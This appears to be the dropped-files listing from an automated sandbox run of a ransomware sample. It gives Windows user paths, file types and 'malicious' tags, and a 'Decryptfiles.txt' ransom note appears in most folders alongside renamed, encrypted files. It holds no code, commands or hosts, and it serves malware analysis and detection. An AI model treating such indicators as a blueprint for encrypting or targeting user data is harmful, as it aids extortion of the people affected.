C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\data.safe.bin
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\background-update
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\events
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\4db4139f-6dcf-40ae-89c1-1ca4ca5a35ed
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\8940dc38-b85f-4355-b090-8e4e300a9627
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b38522d7-1787-4855-a312-c27916e30610
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b3e287d1-bcec-4242-9158-4e1296363490
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\d3698c60-da91-4f8c-b7c7-e14b40be8bb1
DOS executable (COM)
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\d3698c60-da91-4f8c-b7c7-e14b40be8bb1.hmSR (copy)
DOS executable (COM)
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\dd74a7e7-e73b-4ab9-8964-ca5c53c60966
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\session-state.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\state.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extension-preferences.json
zlib compressed data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extensions.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-wal.jKAH
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\handlers.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\parent.lock.nSoU
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\pkcs11.txt
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
OpenPGP Secret Key
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal.OceF
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\3eb2db8e-f770-4c52-9d7b-27180bea4925
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\4cb4db2a-ee68-4128-8ff4-f04bdc710c24
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\75265401-2d75-4127-a70f-7d6e61df69a0
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\7e03a685-c52e-4810-b494-0f433b33ac49
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6281059-34c6-49d8-97c7-24de33b104ab
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b7b7301e-d32e-49f7-b138-9fd21cf2ca6b
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\search.json.mozlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\previous.jsonlz4
SysEx File -
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\.metadata-v2
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal.BYlE
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal.IfAC
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal.MWJn
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
OpenPGP Secret Key
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal.MyAb
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal.lNRa
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal.tsPL
OpenPGP Secret Key
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\targeting.snapshot.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\times.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-wal.WNUc
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\xulstore.json.Hcif
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
data
dropped
malicious
C:\Users\user\AppData\Roaming\_curlrc.KgUE
data
dropped
malicious
C:\Users\user\AppData\Roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\com.adobe.dunamis\61f56613-c62c-4b17-84dd-62b60d5776aa\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\com.adobe.dunamis\6d9d9777-7ded-4768-8191-9a707d72b009\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\com.adobe.dunamis\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Contacts\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\AQRFEVRTGL\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\BNAGMGSPLO.png
data
dropped
malicious
C:\Users\user\Desktop\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\EEGWXUHVUG\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\EFOYFBOLXA.pdf
data
dropped
malicious
C:\Users\user\Desktop\EIVQSAOTAQ.jpg
COM executable for DOS
dropped
malicious
C:\Users\user\Desktop\EIVQSAOTAQ.jpg.mkTG (copy)
COM executable for DOS
dropped
malicious
C:\Users\user\Desktop\EIVQSAOTAQ\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\EOWRVPQCCS\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\GIGIYTFFYT.mp3
data
dropped
malicious
C:\Users\user\Desktop\GRXZDKKVDB.png
data
dropped
malicious
C:\Users\user\Desktop\JDDHMPCDUJ\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs
data
dropped
malicious
C:\Users\user\Desktop\NVWZAPQSQL.jpg
data
dropped
malicious
C:\Users\user\Desktop\NVWZAPQSQL.xlsx
data
dropped
malicious
C:\Users\user\Desktop\NVWZAPQSQL\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\PALRGUCVEH.jpg
data
dropped
malicious
C:\Users\user\Desktop\PALRGUCVEH.mp3
data
dropped
malicious
C:\Users\user\Desktop\PALRGUCVEH.pdf
data
dropped
malicious
C:\Users\user\Desktop\PIVFAGEAAV.docx
data
dropped
malicious
C:\Users\user\Desktop\PIVFAGEAAV.jpg
data
dropped
malicious
C:\Users\user\Desktop\PIVFAGEAAV.xlsx
data
dropped
malicious
C:\Users\user\Desktop\PIVFAGEAAV\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\PIVFAGEAAV\EIVQSAOTAQ.jpg
data
dropped
malicious
C:\Users\user\Desktop\PIVFAGEAAV\NVWZAPQSQL.xlsx
data
dropped
malicious
C:\Users\user\Desktop\PIVFAGEAAV\PALRGUCVEH.pdf
data
dropped
malicious
C:\Users\user\Desktop\PIVFAGEAAV\ZIPXYXWIOY.mp3
data
dropped
malicious
C:\Users\user\Desktop\PWCCAWLGRE.docx
data
dropped
malicious
C:\Users\user\Desktop\PWCCAWLGRE.xlsx
data
dropped
malicious
C:\Users\user\Desktop\PWCCAWLGRE\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\PWCCAWLGRE\GRXZDKKVDB.png
data
dropped
malicious
C:\Users\user\Desktop\PWCCAWLGRE\NVWZAPQSQL.jpg
data
dropped
malicious
C:\Users\user\Desktop\PWCCAWLGRE\PALRGUCVEH.mp3
data
dropped
malicious
C:\Users\user\Desktop\PWCCAWLGRE\PWCCAWLGRE.docx
data
dropped
malicious
C:\Users\user\Desktop\PWCCAWLGRE\SQSJKEBWDT.pdf
data
dropped
malicious
C:\Users\user\Desktop\QCFWYSKMHA.docx
OpenPGP Secret Key
dropped
malicious
C:\Users\user\Desktop\QCFWYSKMHA\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\QCFWYSKMHA\SQSJKEBWDT.mp3
data
dropped
malicious
C:\Users\user\Desktop\QCFWYSKMHA\SUAVTZKNFL.pdf
data
dropped
malicious
C:\Users\user\Desktop\SQSJKEBWDT.pdf
data
dropped
malicious
C:\Users\user\Desktop\SUAVTZKNFL.docx
data
dropped
malicious
C:\Users\user\Desktop\SUAVTZKNFL.pdf
data
dropped
malicious
C:\Users\user\Desktop\SUAVTZKNFL\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.pdf
data
dropped
malicious
C:\Users\user\Desktop\SUAVTZKNFL\GIGIYTFFYT.mp3
data
dropped
malicious
C:\Users\user\Desktop\SUAVTZKNFL\PALRGUCVEH.jpg
DOS executable (COM, 0x8C-variant)
dropped
malicious
C:\Users\user\Desktop\SUAVTZKNFL\PALRGUCVEH.jpg.xSqw (copy)
DOS executable (COM, 0x8C-variant)
dropped
malicious
C:\Users\user\Desktop\SUAVTZKNFL\SQSJKEBWDT.xlsx
data
dropped
malicious
C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx
data
dropped
malicious
C:\Users\user\Desktop\SUAVTZKNFL\ZGGKNSUKOP.png
data
dropped
malicious
C:\Users\user\Desktop\TQDFJHPUIU.png
data
dropped
malicious
C:\Users\user\Desktop\UNKRLCVOHV\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\ZIPXYXWIOY\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\AQRFEVRTGL\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\BNAGMGSPLO.png
data
dropped
malicious
C:\Users\user\Documents\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\EEGWXUHVUG\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\EFOYFBOLXA.pdf
data
dropped
malicious
C:\Users\user\Documents\EIVQSAOTAQ.jpg
data
dropped
malicious
C:\Users\user\Documents\EIVQSAOTAQ\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\EOWRVPQCCS\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\GIGIYTFFYT.mp3
data
dropped
malicious
C:\Users\user\Documents\JDDHMPCDUJ\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\NVWZAPQSQL.jpg
data
dropped
malicious
C:\Users\user\Documents\NVWZAPQSQL.xlsx
data
dropped
malicious
C:\Users\user\Documents\NVWZAPQSQL\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\PALRGUCVEH.jpg
OpenPGP Public Key
dropped
malicious
C:\Users\user\Documents\PALRGUCVEH.mp3
data
dropped
malicious
C:\Users\user\Documents\PALRGUCVEH.pdf
data
dropped
malicious
C:\Users\user\Documents\PIVFAGEAAV.docx
data
dropped
malicious
C:\Users\user\Documents\PIVFAGEAAV.jpg
data
dropped
malicious
C:\Users\user\Documents\PIVFAGEAAV.xlsx
data
dropped
malicious
C:\Users\user\Documents\PIVFAGEAAV\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\PIVFAGEAAV\PALRGUCVEH.pdf
data
dropped
malicious
C:\Users\user\Documents\PIVFAGEAAV\TQDFJHPUIU.png
data
dropped
malicious
C:\Users\user\Documents\PWCCAWLGRE.xlsx
data
dropped
malicious
C:\Users\user\Documents\PWCCAWLGRE\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\PWCCAWLGRE\NVWZAPQSQL.jpg
data
dropped
malicious
C:\Users\user\Documents\PWCCAWLGRE\PALRGUCVEH.mp3
OpenPGP Public Key
dropped
malicious
C:\Users\user\Documents\PWCCAWLGRE\PWCCAWLGRE.docx
data
dropped
malicious
C:\Users\user\Documents\QCFWYSKMHA.docx
data
dropped
malicious
C:\Users\user\Documents\QCFWYSKMHA\BNAGMGSPLO.png
data
dropped
malicious
C:\Users\user\Documents\QCFWYSKMHA\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\QCFWYSKMHA\PIVFAGEAAV.jpg
data
dropped
malicious
C:\Users\user\Documents\QCFWYSKMHA\PWCCAWLGRE.xlsx
data
dropped
malicious
C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx
data
dropped
malicious
C:\Users\user\Documents\QCFWYSKMHA\SQSJKEBWDT.mp3
data
dropped
malicious
C:\Users\user\Documents\SQSJKEBWDT.mp3
data
dropped
malicious
C:\Users\user\Documents\SQSJKEBWDT.pdf
data
dropped
malicious
C:\Users\user\Documents\SUAVTZKNFL.docx
data
dropped
malicious
C:\Users\user\Documents\SUAVTZKNFL\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\SUAVTZKNFL\EFOYFBOLXA.pdf
data
dropped
malicious
C:\Users\user\Documents\SUAVTZKNFL\GIGIYTFFYT.mp3
data
dropped
malicious
C:\Users\user\Documents\SUAVTZKNFL\SQSJKEBWDT.xlsx
data
dropped
malicious
C:\Users\user\Documents\SUAVTZKNFL\SUAVTZKNFL.docx
data
dropped
malicious
C:\Users\user\Documents\TQDFJHPUIU.png
data
dropped
malicious
C:\Users\user\Documents\UNKRLCVOHV\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\ZIPXYXWIOY\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Downloads\BNAGMGSPLO.png
data
dropped
malicious
C:\Users\user\Downloads\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Downloads\EFOYFBOLXA.pdf
data
dropped
malicious
C:\Users\user\Downloads\EIVQSAOTAQ.jpg
data
dropped
malicious
C:\Users\user\Downloads\GIGIYTFFYT.mp3
OpenPGP Secret Key Version 2
dropped
malicious
C:\Users\user\Downloads\GRXZDKKVDB.png
data
dropped
malicious
C:\Users\user\Downloads\NVWZAPQSQL.jpg
data
dropped
malicious
C:\Users\user\Downloads\NVWZAPQSQL.xlsx
data
dropped
malicious
C:\Users\user\Downloads\PALRGUCVEH.jpg
PGP Secret Sub-key -
dropped
malicious
C:\Users\user\Downloads\PALRGUCVEH.pdf
data
dropped
malicious
C:\Users\user\Downloads\PIVFAGEAAV.jpg
data
dropped
malicious
C:\Users\user\Downloads\PIVFAGEAAV.xlsx
data
dropped
malicious
C:\Users\user\Downloads\SQSJKEBWDT.mp3
data
dropped
malicious
C:\Users\user\Downloads\SQSJKEBWDT.pdf
data
dropped
malicious
C:\Users\user\Downloads\SQSJKEBWDT.xlsx
COM executable for DOS
dropped
malicious
C:\Users\user\Downloads\SQSJKEBWDT.xlsx.JQkH (copy)
COM executable for DOS
dropped
malicious
C:\Users\user\Downloads\SUAVTZKNFL.docx
data
dropped
malicious
C:\Users\user\Downloads\SUAVTZKNFL.pdf
data
dropped
malicious
C:\Users\user\Downloads\ZGGKNSUKOP.png
data
dropped
malicious
C:\Users\user\Downloads\ZIPXYXWIOY.mp3
data
dropped
malicious
C:\Users\user\Downloads\downloaded.pdf
data
dropped
malicious
C:\Users\user\Favorites\Amazon.url
data
dropped
malicious
C:\Users\user\Favorites\Bing.url
data
dropped
malicious
C:\Users\user\Favorites\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Favorites\Facebook.url
data
dropped
malicious
C:\Users\user\Favorites\Google.url
data
dropped
malicious
C:\Users\user\Favorites\Links\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Favorites\Live.url
data
dropped
malicious
C:\Users\user\Favorites\NYTimes.url
data
dropped
malicious
C:\Users\user\Favorites\Twitter.url
data
dropped
malicious
C:\Users\user\Favorites\Wikipedia.url
data
dropped
malicious
C:\Users\user\Favorites\Youtube.url
data
dropped
malicious
C:\Users\user\Links\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Music\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\NTUSER.DAT.cJXQ
data
dropped
malicious
C:\Users\user\NTUSER.DAT.qCnN
data
dropped
malicious
C:\Users\user\OneDrive\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Pictures\Camera Roll\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Pictures\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Pictures\Saved Pictures\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Recent\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Saved Games\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Searches\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms
data
dropped
malicious
C:\Users\user\Videos\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
